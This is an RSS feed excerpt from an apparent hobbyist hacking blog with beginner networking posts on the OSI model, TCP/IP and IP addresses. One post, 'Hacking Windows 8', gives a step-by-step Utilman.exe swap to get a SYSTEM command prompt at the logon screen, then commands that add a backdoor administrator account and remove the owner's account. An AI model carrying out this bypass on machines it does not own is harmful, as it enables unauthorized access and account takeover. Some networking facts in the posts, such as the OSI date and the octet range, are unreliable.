&#8211; Flow Control<br />
&#8211; Error Correction<br />
&#8211; Broadcasting</p>
<p>3. Internet Layer:</p>
<p>This layer divides the segments of the transport layer into packets and sends the packets across the networks that make up the Internet. It uses IP, or internet protocol addresses to<br />
determine the location of the recipient device. It does not ensure reliability in the connections, because this is already taken care of by the transport layer, but it is responsible<br />
for selecting the best route between the originating device and the recipient device.</p>
<p>4.Network access layer:</p>
<p>This layer is in charge of sending information at both the LAN level and the physical level. It transforms all the information that arrives from the superior layers into basic information (bits) and directs it to the proper location. At this level, the destination of the information is determined by the MAC, or media access control, address of the recipient device.</p>
<p><img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>so this is all about TCP/IP model&#8230;in next post we will see about Ports and Protocols working in TCP/IP model&#8230;.</p>
<p>Hope you liked it! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>Thanks <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2013/01/08/tcpip-model/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">65</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/tcpip1.png?w=215" medium="image">
			<media:title type="html">tcpip</media:title>
		</media:content>
	</item>
		<item>
		<title>Hacking Windows 8</title>
		<link>https://offensivehacking.wordpress.com/2013/01/05/hacking-windows-8/</link>
					<comments>https://offensivehacking.wordpress.com/2013/01/05/hacking-windows-8/#comments</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Sat, 05 Jan 2013 16:52:09 +0000</pubDate>
				<category><![CDATA[GAINING ACCESS]]></category>
		<category><![CDATA[WINDOWS HACKING]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[administrator]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[HACKING]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[login]]></category>
		<category><![CDATA[media]]></category>
		<category><![CDATA[unix]]></category>
		<category><![CDATA[utilman.exe]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[windows8]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=54</guid>

					<description><![CDATA[Hello friends&#8230;&#8230;. Hope you doin good&#8230;:) This is a chilly-hot post on &#8220;hacking windows 8 admin account or any account!&#8221; 😉 So&#8230;open up your shitty windows 8 box and be ready to fool around!!!! 😀 😛 Let&#8217;s go&#8230; 1. Your logon screen looks like this&#8230; 2.  Insert any Linux Distro media and restart your PC.. &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2013/01/05/hacking-windows-8/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p>Hello friends&#8230;&#8230;.</p>
<p>Hope you doin good&#8230;:)</p>
<p>This is a chilly-hot post on &#8220;hacking windows 8 admin account or any account!&#8221; <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>So&#8230;open up your shitty windows 8 box and be ready to fool around!!!! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f61b.png" alt="😛" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/inline-2-windows-8-logo-pgram.jpg"><img loading="lazy" data-attachment-id="55" data-permalink="https://offensivehacking.wordpress.com/2013/01/05/hacking-windows-8/inline-2-windows-8-logo-pgram/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/inline-2-windows-8-logo-pgram.jpg" data-orig-size="642,325" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="inline-2-windows-8-logo-pgram" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/inline-2-windows-8-logo-pgram.jpg?w=584" class="alignnone size-medium wp-image-55" alt="inline-2-windows-8-logo-pgram" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/inline-2-windows-8-logo-pgram.jpg?w=300&#038;h=98"   /></a></p>
<p>Let&#8217;s go&#8230;</p>
<p>1. Your logon screen looks like this&#8230;</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/logon.png"><img loading="lazy" data-attachment-id="57" data-permalink="https://offensivehacking.wordpress.com/2013/01/05/hacking-windows-8/logon-2/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/logon.png" data-orig-size="1025,771" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="logon" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/logon.png?w=584" class="alignnone size-medium wp-image-57" alt="logon" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/logon.png?w=300&#038;h=186"   /></a></p>
<p>2.  Insert any Linux Distro media and restart your PC.. (I will be using Ubuntu..)</p>
<p>3. Boot your Linux Distro media&#8230;</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/i386-non-pae-kernel-to-be-removed-from-ubuntu-12-04.jpg"><img loading="lazy" data-attachment-id="58" data-permalink="https://offensivehacking.wordpress.com/2013/01/05/hacking-windows-8/i386-non-pae-kernel-to-be-removed-from-ubuntu-12-04/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/i386-non-pae-kernel-to-be-removed-from-ubuntu-12-04.jpg" data-orig-size="728,396" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="i386-non-PAE-Kernel-To-Be-Removed-from-Ubuntu-12-04" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/i386-non-pae-kernel-to-be-removed-from-ubuntu-12-04.jpg?w=584" class="alignnone size-medium wp-image-58" alt="i386-non-PAE-Kernel-To-Be-Removed-from-Ubuntu-12-04" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/i386-non-pae-kernel-to-be-removed-from-ubuntu-12-04.jpg?w=300&#038;h=158"   /></a></p>
<p>3. Navigate to &#8220;C:\Windows\System32&#8221;  folder  via Filesystem</p>
<p>4. Search for &#8220;Utilman.exe&#8221; file and rename it to &#8220;Utilman1.exe&#8221;</p>
<p>5. Search for &#8220;cmd.exe&#8221; file and rename it to &#8220;Utilman.exe&#8221;</p>
<p>6.  Now remove the linux distro media and restart your PC&#8230;</p>
<p>7. Again you have logon screen in front of you..</p>
<p>8. Click on the icon shown in the figure..</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/logon2.png"><img loading="lazy" data-attachment-id="59" data-permalink="https://offensivehacking.wordpress.com/2013/01/05/hacking-windows-8/logon2/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/logon2.png" data-orig-size="1025,769" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="logon2" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/logon2.png?w=584" class="alignnone size-medium wp-image-59" alt="logon2" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/logon2.png?w=300&#038;h=183"   /></a></p>
<p>9. Whoilaaaaa! You will get a command prompt with administrator privileges&#8230; <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /> AWESOME&#8230;</p>
<p>10. Type &#8220;net user add dummy password&#8221; (without quotes) in the prompt</p>
<p>11. Next.. type &#8220;net localgroup administrators dummy /add&#8221;(without quotes) in the prompt</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/hacked.png"><img loading="lazy" data-attachment-id="60" data-permalink="https://offensivehacking.wordpress.com/2013/01/05/hacking-windows-8/hacked/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/hacked.png" data-orig-size="1023,768" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="hacked" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/hacked.png?w=584" class="alignnone size-medium wp-image-60" alt="hacked" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/hacked.png?w=300&#038;h=196"   /></a></p>
<p>12.Restart your pc, and login with your new user here its &#8220;dummy&#8221; (without quotes) with password as  &#8220;password&#8221;(without quotes).</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/hacked2.png"><img loading="lazy" data-attachment-id="61" data-permalink="https://offensivehacking.wordpress.com/2013/01/05/hacking-windows-8/hacked2/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/hacked2.png" data-orig-size="1022,768" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="hacked2" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/hacked2.png?w=584" class="alignnone size-medium wp-image-61" alt="hacked2" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/hacked2.png?w=300&#038;h=199"   /></a></p>
<p>13.  You can delete the old account(&#8220;admin&#8221; here..) from the control panel as you are the user with administrator privileges&#8230;</p>
<p>So&#8230;. What did we just do?????????</p>
<p>Now&#8230;utilman.exe is the Windows Utility manager giving you access to useful UI settings within Windows&#8230;it can be launched by clicking the icon  as we see in step 8.</p>
<p>It is located at &#8220;C:\Windows\System32\utilman.exe&#8221;</p>
<p>In step.4 and step.5&#8230; we renamed original &#8220;utilman.exe&#8221; to other name say &#8220;utilman1.exe&#8221; and  renamed command prompt file i.e &#8220;cmd.exe&#8221; to  &#8220;utilman.exe&#8221;..</p>
<p>So when we click the icon..utilman.exe is executed which is nothing but the command prompt( remember we are just renaming cmd.exe) <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>So we get the command prompt with administrator privileges&#8230;</p>
<p>Next..we create an account with name as &#8220;dummy&#8221; and password as &#8220;password&#8221; in step.10 and made it an administrator account in step.11</p>
<p>After restarting your PC, We can now login with username as &#8220;dummy&#8221; and password as &#8220;password&#8221; and delete the old account&#8230;</p>
<p>Congrats you are now the administrator&#8230; <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>Hope you enjoyed it.. <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f61b.png" alt="😛" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>THANK YOU <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2013/01/05/hacking-windows-8/feed/</wfw:commentRss>
			<slash:comments>4</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">54</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/inline-2-windows-8-logo-pgram.jpg?w=300" medium="image">
			<media:title type="html">inline-2-windows-8-logo-pgram</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/logon.png?w=300" medium="image">
			<media:title type="html">logon</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/i386-non-pae-kernel-to-be-removed-from-ubuntu-12-04.jpg?w=300" medium="image">
			<media:title type="html">i386-non-PAE-Kernel-To-Be-Removed-from-Ubuntu-12-04</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/logon2.png?w=300" medium="image">
			<media:title type="html">logon2</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/hacked.png?w=300" medium="image">
			<media:title type="html">hacked</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/hacked2.png?w=300" medium="image">
			<media:title type="html">hacked2</media:title>
		</media:content>
	</item>
		<item>
		<title>OSI Reference Model</title>
		<link>https://offensivehacking.wordpress.com/2012/11/29/osi-reference-model/</link>
					<comments>https://offensivehacking.wordpress.com/2012/11/29/osi-reference-model/#comments</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Thu, 29 Nov 2012 04:28:38 +0000</pubDate>
				<category><![CDATA[NETWORKING]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=48</guid>

					<description><![CDATA[Good Morning Friends! Its a lovely morning today! That reminds me of a reference from the previous post&#8230;.we&#8217;ll talk about OSI Reference model!! Now&#8230;we need a particular framework over which computers can communicate with each other through various standards..Long Back in 1947(i guess ), ISO(International Standards Organisation) designed a model for network communications called OSI &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2012/11/29/osi-reference-model/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p>Good Morning Friends!</p>
<p>Its a lovely morning today! That reminds me of a reference from the previous post&#8230;.we&#8217;ll talk about OSI Reference model!!</p>
<p>Now&#8230;we need a particular framework over which computers can communicate with each other through various standards..Long Back in 1947(i guess ), ISO(International Standards Organisation) designed a model for network communications called OSI (Open systems interconnections). An open system is a protocol (set of rules) that allow communications between two parties regardless of their underlying architecture &#8230;.</p>
<p>Typically,there are seven layers in OSI model&#8230;</p>
<p>See the fig.below</p>
<p><a href="https://offensivehacking.wordpress.com/2012/11/29/osi-reference-model/osi-model-7-layers/" rel="attachment wp-att-49"><img loading="lazy" data-attachment-id="49" data-permalink="https://offensivehacking.wordpress.com/2012/11/29/osi-reference-model/osi-model-7-layers/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2012/11/osi-model-7-layers.png" data-orig-size="404,467" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="osi-model-7-layers" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2012/11/osi-model-7-layers.png?w=404" class="alignnone size-medium wp-image-49" alt="" src="https://offensivehacking.wordpress.com/wp-content/uploads/2012/11/osi-model-7-layers.png?w=300&#038;h=264"   /></a></p>
<p>The data passes from application  layer  to physical layer at transmitting side and from physical layer to application layer at receiving side&#8230;</p>
<p>A simple diagram explaining it&#8211;&gt;</p>
<p><a href="https://offensivehacking.wordpress.com/2012/11/29/osi-reference-model/osi-model/" rel="attachment wp-att-50"><img loading="lazy" data-attachment-id="50" data-permalink="https://offensivehacking.wordpress.com/2012/11/29/osi-reference-model/osi-model/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2012/11/osi-model.gif" data-orig-size="510,392" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="osi-model-" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2012/11/osi-model.gif?w=510" class="alignnone size-medium wp-image-50" alt="" src="https://offensivehacking.wordpress.com/wp-content/uploads/2012/11/osi-model.gif?w=300&#038;h=259"   /></a></p>
<p>Each Layer add its own header/trailer to the data unit as shown below&#8230;the respective header/trailer contains information possessed by that layer about the network communication</p>
<p><a href="https://offensivehacking.wordpress.com/2012/11/29/osi-reference-model/osi_header_trailer/" rel="attachment wp-att-51"><img loading="lazy" data-attachment-id="51" data-permalink="https://offensivehacking.wordpress.com/2012/11/29/osi-reference-model/osi_header_trailer/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2012/11/osi_header_trailer.jpg" data-orig-size="900,523" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="osi_header_trailer" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2012/11/osi_header_trailer.jpg?w=584" class="alignnone size-medium wp-image-51" alt="" src="https://offensivehacking.wordpress.com/wp-content/uploads/2012/11/osi_header_trailer.jpg?w=300&#038;h=237"   /></a></p>
<p>Now lets discuss the Layers in more detail&#8211;&gt;</p>
<p><strong>Layer 7:Application Layer</strong></p>
<p>-Defines interface to user processes for communication and data transfer in network</p>
<p>-Provides standardized services such as virtual terminal, file and job transfer and operations</p>
<p><strong>Layer 6:Presentation Layer</strong></p>
<p>-Masks the differences of data formats between dissimilar systems</p>
<p>-Specifies architecture-independent data transfer format</p>
<p>-Encodes and decodes data; Encrypts and decrypts data; Compresses and decompresses data</p>
<p><strong>Layer 5:Session Layer</strong></p>
<p>-Manages user sessions and dialogues</p>
<p>-Controls establishment and termination of logic links between users</p>
<p>-Reports upper layer errors</p>
<p><strong>Layer 4:Transport Layer</strong></p>
<p>-Manages end-to-end message delivery in network</p>
<p>-Provides reliable and sequential packet delivery through error recovery and flow control mechanisms</p>
<p>-Provides connectionless oriented packet delivery</p>
<p><strong> Layer 3:Network Layer</strong></p>
<p>-Determines how data are transferred between network devices</p>
<p>-Routes packets according to unique network device addresses</p>
<p>-Provides flow and congestion control to prevent network resource depletion</p>
<p><strong>Layer 2:Data Link Layer</strong></p>
<p>-Defines procedures for operating the communication links</p>
<p>-Frames packets</p>
<p>-Detects and corrects packets transmit errors</p>
<p><strong>Layer 1: Physical Layer</strong></p>
<p>-Defines physical means of sending data over network devices</p>
<p>-Interfaces between network medium and devices</p>
<p>-Defines optical, electrical and mechanical characteristics</p>
<p>There are other network architecture models, such as IBM SNA (Systems Network Architecture) model . Those models are very traditional and hardly play any role in today&#8217;s communication standards!</p>
<p>So this covers up the OSI reference model&#8230;.Next we will put light on TCP/IP model&#8230;</p>
<p>So get ready to dive into it&#8230;</p>
<p>Thanks <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2012/11/29/osi-reference-model/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">48</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2012/11/osi-model-7-layers.png?w=259" medium="image" />

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2012/11/osi-model.gif?w=300" medium="image" />

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2012/11/osi_header_trailer.jpg?w=300" medium="image" />
	</item>
		<item>
		<title>What is an I.P Address?</title>
		<link>https://offensivehacking.wordpress.com/2012/11/27/what-is-an-i-p-address/</link>
					<comments>https://offensivehacking.wordpress.com/2012/11/27/what-is-an-i-p-address/#respond</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Tue, 27 Nov 2012 04:49:22 +0000</pubDate>
				<category><![CDATA[NETWORKING]]></category>
		<category><![CDATA[address]]></category>
		<category><![CDATA[hosts]]></category>
		<category><![CDATA[identity]]></category>
		<category><![CDATA[ip]]></category>
		<category><![CDATA[ipv4]]></category>
		<category><![CDATA[ipv6]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[octet]]></category>
		<category><![CDATA[protocol]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=44</guid>

					<description><![CDATA[HUSSSSSHHHH! I am finally done with those nasty exams! Feeling damn relaxed! 😉 Back to blogging!!! B) Well friends,today our topic of discussion is IP ADDRESS! Well,again many of you might be knowing this,but this post is for novices! To put it simply, an IP address is your computer&#8217;s(a.k.a &#8216;host&#8217;) identity on the internet!! 🙂 &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2012/11/27/what-is-an-i-p-address/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p>HUSSSSSHHHH!</p>
<p>I am finally done with those nasty exams! Feeling damn relaxed! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>Back to blogging!!! B)</p>
<p>Well friends,today our topic of discussion is IP ADDRESS!</p>
<p>Well,again many of you might be knowing this,but this post is for novices!</p>
<p>To put it simply, an IP address is your computer&#8217;s(a.k.a &#8216;host&#8217;) identity on the internet!! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Its nothing more than your computer&#8217;s name except that it is made up of digits(unpleasant! right?) :P!</p>
<p>Computers use the unique identifier to send data to specific computers on a network!</p>
<p>In the same sense that someone needs your mailing address to send you a letter, a remote computer needs your IP address to communicate with your computer (simple enough)!</p>
<p>IP stands for &#8220;INTERNET PROTOCOL&#8221;. What does that mean????</p>
<p>An Internet Protocol is a set of rules that govern Internet activity and facilitate completion of a variety of actions on the World Wide Web for successful two way communication!</p>
<p>Now that flashes me to give a detailed information on protocols in coming few posts!</p>
<p>There are two flavors of IP address: IPv4 and IPv6</p>
<p>IPv4 address is four octet address i.e 32 bit address with each octet seperated  by dot(.) . Eg: 117.156.45.12</p>
<p>Each Octet can have values ranging from 1 to 255! Thus if you see it can address upto  2^32 i.e 4294967296 hosts on the internet!</p>
<p>Amazing! Now as you the population of the world is definitely greater than this figure i.e 4294967296 , what if each one in the world starts using internet?</p>
<p>Quite obviously we will run out of addresses!</p>
<p>To solve this problem,<a title="Internet Engineering Task Force" href="http://en.wikipedia.org/wiki/Internet_Engineering_Task_Force">Internet Engineering Task Force</a> (IETF) came up with new addressing scheme called IPv6 which is the latest version of IP!</p>
<p>Now IPv6 is a 128-bit addresses, allowing for 2<sup>128</sup>, or approximately 2^128 i.e 3.4028237e+38 = 3.4 X 10 ^ 38 hosts on the internet! SO&#8230;.PROBLEM RESOLVED!</p>
<p>IPv6 is having hexadecimal format consist of eight groups of four hex digits separated by colons, for E.g: <code>2001:0db8:85a3:0042:0000:8a2e:0370:7334</code>.</p>
<p>So wrapping it up..IPv4 and IPv6  are used to addressing hosts on the internet and allowing two-way communications between the hosts!</p>
<p>Next, We will be discussing about OSI reference model and TCP/IP model!</p>
<p>Stay tuned&#8230;its all about networks! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>Have a great day!</p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2012/11/27/what-is-an-i-p-address/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">44</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>
	</item>
		<item>
		<title>What is a Computer Network?</title>
		<link>https://offensivehacking.wordpress.com/2012/10/05/what-is-a-computer-network/</link>
					<comments>https://offensivehacking.wordpress.com/2012/10/05/what-is-a-computer-network/#respond</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Fri, 05 Oct 2012 12:23:16 +0000</pubDate>
				<category><![CDATA[NETWORKING]]></category>
		<category><![CDATA[computers]]></category>
		<category><![CDATA[connection]]></category>
		<category><![CDATA[medium]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[nodes]]></category>
		<category><![CDATA[physical]]></category>
		<category><![CDATA[sharing]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=38</guid>

